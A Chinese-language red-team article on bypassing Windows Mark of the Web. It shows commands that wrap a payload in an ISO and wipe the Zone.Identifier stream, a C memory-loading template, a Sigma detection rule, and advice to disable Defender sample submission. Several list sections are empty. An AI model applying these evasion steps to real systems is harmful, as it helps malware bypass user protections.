Windows标记网络(Mark of the Web,简称MotW)是微软从IE时代延续至今的安全机制,主要用于标识来自非本地可信区域的网络文件。当用户从互联网下载文件时,系统会自动在文件NTFS备用数据流(Alternate Data Stream)中添加特殊标记,触发Windows Defender等安全组件的额外扫描行为。
这个机制最早可追溯到2004年发布的Windows XP SP2,当时主要应对网页挂马和恶意下载的威胁。随着攻击技术的演进,MotW逐渐成为红队行动中需要重点处理的防御节点。根据微软2022年安全报告,约67%的企业攻击链初始阶段都涉及MotW相关防御的绕过。
当文件通过以下渠道进入系统时会被添加MotW标记:
标记存储在NTFS备用数据流中,可通过命令行查看:
cmd复制more < test.exe:Zone.Identifier
[ZoneTransfer]
ZoneId=3
现代Windows系统采用多层验证机制:
方法一:容器文件封装
powershell复制# 创建ISO镜像并加载
New-ISOFile -Path payload.iso -SourcePath payload.exe
Mount-DiskImage -ImagePath payload.iso
ISO文件默认不继承MotW标记,但需注意:
方法二:备用数据流清除
cmd复制# 清除Zone.Identifier数据流
echo. > payload.exe:Zone.Identifier
注意事项:
反射式DLL注入改良方案:
c复制// 绕过MotW检查的内存加载模板
HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
DWORD dwSize = GetFileSize(hFile, NULL);
LPVOID lpBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
ReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL);
CloseHandle(hFile);
// 关键内存属性修改
DWORD dwOldProtect;
VirtualProtect(lpBuffer, dwSize, PAGE_EXECUTE_READ, &dwOldProtect);
技术要点:
日志监控关键点:
高级检测规则示例:
xml复制<!-- Sigma规则示例 -->
<title>可疑的MotW清除行为</title>
<description>检测Zone.Identifier数据流的异常修改</description>
<detection>
<selection>
EventID=15
TargetFilename|endswith=":Zone.Identifier"
</selection>
<condition>selection</condition>
</detection>
阶段化载荷投递:
关键规避技巧:
Windows 11 22H2引入的新机制:
应对建议:
重要提示:所有技术研究应在授权环境下进行,实际攻防对抗中需严格遵守相关法律法规。建议使用VMWare等虚拟化平台构建隔离测试环境,配置组策略禁用自动样本提交功能(Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > MAPS)